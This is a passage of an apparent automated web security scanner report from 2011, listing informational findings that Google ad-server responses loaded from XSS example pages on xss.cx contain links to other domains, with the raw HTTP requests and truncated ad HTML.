<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-dork-xss-cross-site-scripting-examples.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&amp;usg=AFQjCNEvnQJ7uNM-GxRSA3iJXsKf89ApPg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.34. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998821&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcdn.nypost.com.html&dt=1301748980173&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748980186&frm=0&adk=1607234649&ga_vid=673946304.1301748980&ga_sid=1301748980&ga_hid=1486977233&ga_fc=0&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=20&xpc=CQa5baqmkH&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:44 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cdn.nypost.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.opnet.com/network-diagram%26adT%3DNetwork%2BDiagram%2BTool%26adU%3Ddegree-online.NECB.edu%26adT%3DAccounting%2BDegree:%2BOnline%26adU%3DEarnMyDegree.com/Art%2526amp%253BDesign%26adT%3DCreative%2BWriting%2BPrograms%26gl%3DUS&amp;usg=AFQjCNHSkGH26TMQcJYoWeXTKoe6l2CxUg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.35. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767057&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html&dt=1301749057283&shv=r20110324&jsv=r20110321-2&saldr=1&correlator=1301749057291&frm=0&adk=1607234649&ga_vid=1599168405.1301749057&ga_sid=1301749057&ga_hid=268240308&ga_fc=0&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895130&fu=0&ifi=1&dtd=13&xpc=inbAgl85Nb&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4055

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DOpManager.ManageEngine.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHlrMX8gFh5OQZUQL2ey6CkwdJJsA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.36. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766656&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcross-site-scripting-sso-xss.login.openx.org.html&dt=1301748656596&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748656682&frm=0&adk=1607234649&ga_vid=1633126226.1301748657&ga_sid=1301748657&ga_hid=1695340207&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=988&fu=0&ifi=1&dtd=114&xpc=zbgGQFLVIE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:50:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cross-site-scripting-sso-xss.login.openx.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.management.qualys.com%26adT%3DWireless%2BVulnerabilities%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26gl%3DUS&amp;usg=AFQjCNE5hjZnViYI9p0fE9b1r0bZfMaZow" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.37. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766285&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-cross-site-scripting.www.norwich.edu.html&dt=1301748285145&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748285207&frm=0&adk=1607234649&ga_vid=1031013934.1301748285&ga_sid=1301748285&ga_hid=1004053173&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=94&xpc=4iHGLQIcCW&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4656

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CLGejuCi_6KFYBDYBRhaMgjt1P_y9_XtXQ">
...[SNIP]...
AO6AvUDAAAAxA%26num%3D1%26sig%3DAGiWqtwJr8ev6lNA5hl1lLzRKsQhlZ-VLA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CLGejuCi_6KFYBDYBRhaMgjt1P_y9_XtXQ" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAbZkGhqXTdGjFo31lAeDvtGJCd7theEB7rG7zhGWk9-WSbC3jwEQARgBIL7O5Q04AFD-ueqD-P____8BYMkGoAHu8sn5A7oBCTcyOHg5MF9hc8gBBNoBTWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvY3dlLTc5LWNyb3NzLXNpdGUtc2NyaXB0aW5nLnd3dy5ub3J3aWNoLmVkdS5odG1sgAIBuAIYwAIFyALu5LYUqAMB6APGKugDqQnoA9wF6AO6AvUDAAAAxA%26num%3D1%26sig%3DAGiWqtwJr8ev6lNA5hl1lLzRKsQhlZ-VLA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cwe-79-cross-site-scripting.www.norwich.edu.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHbo46WMAetjQAOr7yRDBN_t_7EhA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.38. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcaptavi.com.xss-cross-site-scripting.html&dt=1301748930615&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748930621&frm=0&adk=1607234649&ga_vid=846263838.1301748931&ga_sid=1301748931&ga_hid=838483375&ga_fc=0&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=11&xpc=G5y5YLdbBo&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12425

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/captavi.com.xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNGcJyO_0cl68PMYA8b74TQJRmjkwA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.39. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbluefly.com.html&dt=1301749184430&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749184446&frm=0&adk=1607234649&ga_vid=320306698.1301749184&ga_sid=1301749184&ga_hid=351342536&ga_fc=0&u_tz=-300&u_his=33&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=24&xpc=xrsCZs9tN2&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:08 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/bluefly.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.UTI.edu/Marine%26adT%3DUTI%2BMarine%2BTech%2BSchool%26adU%3DMastersinLaw.TJSL.edu%26adT%3DMaster%2Bof%2BLaws%2BDegree%26adU%3Dwww.Fishing-In-Saskatchewan.com%26adT%3DFishing%2Bin%2BSaskatchewan%26gl%3DUS&amp;usg=AFQjCNGuKK03ZoUVv03Km5vasrNf_qsVpg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.40. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766843&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss.flowplayer.org.html&dt=1301748843548&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748843555&frm=0&adk=1607234649&ga_vid=1094437628.1301748844&ga_sid=1301748844&ga_hid=1504562185&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=11&xpc=eXgZqjDNsK&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:27 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4283

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss.flowplayer.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF24-9tQOLRJAAIU1s1Ka4M1ytLUA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.41. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcwe-79-xss-dork-www.ovh.com.html&dt=1301748869734&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748869748&frm=0&adk=1607234649&ga_vid=1815080875.1301748870&ga_sid=1301748870&ga_hid=1055404040&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=19&xpc=b3g2tgY6a4&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
